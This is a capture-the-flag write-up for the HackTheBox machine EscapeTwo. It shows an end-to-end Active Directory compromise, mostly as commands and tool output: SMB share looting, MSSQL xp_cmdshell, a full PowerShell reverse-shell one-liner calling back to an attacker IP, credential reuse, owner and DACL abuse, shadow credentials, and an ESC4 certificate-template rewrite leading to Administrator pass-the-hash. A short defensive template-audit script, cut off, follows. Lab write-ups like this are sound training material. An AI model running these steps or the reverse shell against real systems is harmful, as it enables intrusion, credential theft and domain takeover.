quockhanh020903
![image](https://hackmd.io/_uploads/BkACjPPcZx.png)

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# nmap -sC -sV 10.10.11.51 -oA /root/Documents/HTB/EscapeTwo/escapetwo
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-31 09:42 EDT
Nmap scan report for escapetwo.htb (10.10.11.51)
Host is up (0.35s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-31 13:43:32Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time.
| ms-sql-ntlm-info:
|   10.10.11.51:1433:
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info:
|   10.10.11.51:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-05-31T13:37:15
|_Not valid after:  2055-05-31T13:37:15
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-05-31T13:45:03+00:00; +30s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-31T13:45:03+00:00; +31s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-05-31T13:44:25
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.42 seconds
```

The open services are: DNS, Kerberos, LDAP, SMB, MSSQL, WinRM, LDAPS.

Key information:

* Domain: sequel.htb
* DNS: DC01.sequel.htb - Microsoft SQL Server 2019

Add the domain names to /etc/hosts:

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# echo "10.10.11.51 dc01.sequel.htb sequel.htb" | sudo tee -a /etc/hosts
10.10.11.51 dc01.sequel.htb sequel.htb
```

![image](https://hackmd.io/_uploads/SkTMhPwqbx.png)

We have the account credentials rose / KxEPkKe6R8su. With the provided credentials we try to connect to the services (SMB, MSSQL, LDAP, ...). First we look for SMB shares using our credentials.

Enumerate SMB user information:

```
crackmapexec smb escapetwo.htb -u "rose" -p "KxEPkKe6R8su" --rid-brute | grep SidTypeUser
```

Connect remotely over SMB with the credentials of user rose that we already have:

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# smbclient -L //10.10.11.51 -U rose -m SMB2
Password for [WORKGROUP\rose]:

        Sharename       Type      Comment
        ---------       ----      -------
        Accounting Department Disk
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.51 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

We notice that we have access to two shares: **Accounting Department** and **Users**. We access the **Accounting Department** share with the credentials, find Excel files, download them and read them.

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# smbclient //10.10.11.51/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun  9 06:52:21 2024
  ..                                  D        0  Sun Jun  9 06:52:21 2024
  accounting_2024.xlsx                A    10217  Sun Jun  9 06:14:49 2024
  accounts.xlsx                       A     6780  Sun Jun  9 06:52:07 2024

                6367231 blocks of size 4096. 868375 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (4.0 KiloBytes/sec) (average 4.0 KiloBytes/sec)
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (5.9 KiloBytes/sec) (average 5.0 KiloBytes/sec)
```

We open the file with Open and Repair in Microsoft Excel and get the following table:

| First Name | Last Name | Email             | Username | Password         |
|------------|-----------|-------------------|----------|------------------|
| Angela     | Martin    | angela@sequel.htb | angela   | 0fwz7Q4mSpurIt99 |
| Oscar      | Martinez  | oscar@sequel.htb  | oscar    | 86LxLBMgEWaKUnBG |
| Kevin      | Malone    | kevin@sequel.htb  | kevin    | Md9Wlq1E5bZnVDVo |
| NULL       | NULL      | sa@sequel.htb     | sa       | MSSQLP@ssw0rd!   |

We have the pair username: sa and password: MSSQLP@ssw0rd!, most likely the SQL credentials on the target server. We use the sa credentials to connect to MSSQL on the target:

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell hostname
output
------
DC01
NULL
SQL (sa  dbo@master)> exec xp_cmdshell "chdir"
output
-------------------
C:\Windows\system32
NULL
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> RECONFIGURE;
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell';
name          minimum   maximum   config_value   run_value
-----------   -------   -------   ------------   ---------
xp_cmdshell         0         1              1           1
SQL (sa  dbo@master)> exec xp_cmdshell "chdir"
output
-------------------
C:\Windows\system32
NULL
SQL (sa  dbo@master)>
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# impacket-mssqlclient sa:'MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa  dbo@master)> EXEC xp_cmdshell 'whoami';
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (sa  dbo@master)>
SQL (sa  dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> RECONFIGURE;
SQL (sa  dbo@master)>
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> RECONFIGURE;
SQL (sa  dbo@master)>
SQL (sa  dbo@master)> EXEC xp_cmdshell 'whoami';
output
--------------
sequel\sql_svc
NULL
SQL (sa  dbo@master)>
SQL (sa  dbo@master)> EXEC xp_cmdshell 'powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient(''10.10.16.59'',293);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + ''PS '' + (pwd).Path + ''> '';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"'
```

```
┌──(root㉿lyquockhanh)-[~]
└─# nc -lvnp 293
listening on [any] 293 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.11.51] 50025
whoami
sequel\sql_svc
PS C:\Windows\system32> cd C:\SQL2019\ExpressAdv_ENU
PS C:\SQL2019\ExpressAdv_ENU> ls


    Directory: C:\SQL2019\ExpressAdv_ENU


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/8/2024   3:07 PM                1033_ENU_LP
d-----         6/8/2024   3:07 PM                redist
d-----         6/8/2024   3:07 PM                resources
d-----         6/8/2024   3:07 PM                x64
-a----        9/24/2019  10:03 PM             45 AUTORUN.INF
-a----        9/24/2019  10:03 PM            788 MEDIAINFO.XML
-a----         6/8/2024   3:07 PM             16 PackageId.dat
-a----        9/24/2019  10:03 PM         142944 SETUP.EXE
-a----        9/24/2019  10:03 PM            486 SETUP.EXE.CONFIG
-a----         6/8/2024   3:07 PM            717 sql-Configuration.INI
-a----        9/24/2019  10:03 PM         249448 SQLSETUPBOOTSTRAPPER.DLL


PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
PS C:\SQL2019\ExpressAdv_ENU>
```

We find two important pieces of information:

```
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# cat user.txt
angela
oscar
kevin
sa
sql_svc
ryan
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# nxc smb 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3'
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [-] sequel.htb\angela:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB         10.10.11.51     445    DC01             [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB         10.10.11.51     445    DC01             [-] sequel.htb\kevin:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB         10.10.11.51     445    DC01             [-] sequel.htb\sa:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB         10.10.11.51     445    DC01             [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# nxc ldap 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3'
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.51     389    DC01             [-] sequel.htb\angela:WqSZAF6CysDQbGb3
LDAP        10.10.11.51     389    DC01             [-] sequel.htb\oscar:WqSZAF6CysDQbGb3
LDAP        10.10.11.51     389    DC01             [-] sequel.htb\kevin:WqSZAF6CysDQbGb3
LDAP        10.10.11.51     389    DC01             [-] sequel.htb\sa:WqSZAF6CysDQbGb3
LDAP        10.10.11.51     389    DC01             [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# nxc winrm 10.10.11.51 -u user.txt -p 'WqSZAF6CysDQbGb3'
WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\angela:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\oscar:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\kevin:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\sa:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)
```

We find username: ryan and password: WqSZAF6CysDQbGb3, which lets us connect remotely to the system over WinRM:

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo/Certify]
└─# evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> cd ../
*Evil-WinRM* PS C:\Users\ryan> cd Desktop
*Evil-WinRM* PS C:\Users\ryan\Desktop> ls


    Directory: C:\Users\ryan\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        5/31/2025   6:37 AM             34 user.txt


*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
f38ad9d224f1a9606fc05501f433f763
```

![image](https://hackmd.io/_uploads/H1CYnwP9-g.png)

Now that we have a shell and have done some enumeration, I want to launch BloodHound, mark every user we hold valid credentials for as owned, and see which attack paths we have for privilege escalation.

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -dc DC01.sequel.htb -ns 10.10.11.51 -c All --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.sequel.htb:88)] [Errno 111] Connection refused
INFO: Connecting to LDAP server: DC01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 01M 20S
INFO: Compressing output into 20250531102900_bloodhound.zip
```

We can see that our owned user Ryan has “WriteOwner” on CA_SVC.

![image](https://hackmd.io/_uploads/ryaA3DvcWe.png)

![image](https://hackmd.io/_uploads/HJPxavw9Wg.png)

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250531-110856.bak
[*] DACL modified successfully!
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3b939dea-960e-93eb-58ac-185a70924994'
[*] Adding Key Credential with device ID '3b939dea-960e-93eb-58ac-185a70924994' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '3b939dea-960e-93eb-58ac-185a70924994' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce
```

```
┌──(root㉿lyquockhanh)-[~/Documents/HTB/EscapeTwo]
└─# certipy-ad find -u 'ca_svc' -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' -stdout -vulnerable -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
```

An ESC4 vulnerability is found.

```
certipy-ad req -username ca_svc@sequel.htb -p 'Password123!!' -ca sequel-DC01-CA -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb
```

```
┌──(root㉿lyquockhanh)-[~]
└─# nano /etc/resolv.conf

┌──(root㉿lyquockhanh)-[~]
└─# cat /etc/resolv.conf
# Generated by NetworkManager
search localdomain
nameserver 10.10.11.51
```

```
┌──(root㉿lyquockhanh)-[~]
└─# certipy-ad template -u ca_svc@sequel.htb -target sequel.htb \
    -template DunderMifflinAuthentication \
    -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' \
    -save-old -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'sequel.htb' at '10.10.11.51'
[+] Trying to resolve 'SEQUEL.HTB' at '10.10.11.51'
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.51:636 - ssl
[+] Default path: DC=sequel,DC=htb
[+] Configuration path: CN=Configuration,DC=sequel,DC=htb
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[+] MODIFY_DELETE:
[+]     pKIExtendedKeyUsage: []
[+]     msPKI-Certificate-Application-Policy: []
[+] MODIFY_REPLACE:
[+]     nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00']
[+]     flags: [b'0']
[+]     pKIDefaultKeySpec: [b'2']
[+]     pKIKeyUsage: [b'\x86\x00']
[+]     pKIMaxIssuingDepth: [b'-1']
[+]     pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15']
[+]     pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff']
[+]     pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0']
[+]     msPKI-Enrollment-Flag: [b'0']
[+]     msPKI-Private-Key-Flag: [b'16842768']
[+]     msPKI-Certificate-Name-Flag: [b'1']
[*] Successfully updated 'DunderMifflinAuthentication'
```

```
┌──(root㉿lyquockhanh)-[~]
└─# certipy-ad req -u ca_svc@sequel.htb -target sequel.htb \
    -upn administrator@sequel.htb \
    -ca sequel-DC01-CA -template DunderMifflinAuthentication \
    -dc-ip 10.10.11.51 \
    -hashes ':3b181b914e7a9d5508ea1e20bc2b7fce' \
    -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'sequel.htb' at '10.10.11.51'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.51[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.51[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```

```
┌──(root㉿lyquockhanh)-[~]
└─# ntpdate 10.10.11.51
2025-06-04 23:34:06.426353 (-0400) -1252.248469 +/- 0.107174 10.10.11.51 s1 no-leap
CLOCK: time stepped by -1252.248469

┌──(root㉿lyquockhanh)-[~]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
```

```
┌──(root㉿lyquockhanh)-[~]
└─# evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/4/2025  12:40 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
9ae6967f3c8d7de1703571cf8e57d09e
```

![image](https://hackmd.io/_uploads/S1Bvpwvq-e.png)

![image](https://hackmd.io/_uploads/ByusRwP9Zl.png)
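For the defensive side of the last two steps above, the `certipy-ad find` output (Cert Publishers holding Full Control on DunderMifflinAuthentication, i.e. ESC4) and the template rewrite that `certipy-ad template` performed (name flag 1, enrollment flag 0, EKUs cleared), here is an added audit example that is not part of the original writeup and not Certipy code. It checks a template's object-control rights against a tier-0 allow list and tests whether its current attributes form an ESC1-style state; the flag constants are from MS-CRTD, the two sample templates are constructed from the values on the page, and the enrollment principal of the rewritten template is an assumption.

```python
"""Audit an AD CS certificate template for the two weaknesses chained in
this writeup: non-tier-0 principals holding object-control rights (ESC4)
and the ESC1-style state such a principal can push the template into.

Added example, not part of the original writeup and not Certipy code.
Flag values come from MS-CRTD; the sample templates are constructed from
the certipy output shown on the page.
"""
from dataclasses import dataclass, field

# msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag bits (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_DNS = 0x08000000
CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME = 0x40000000
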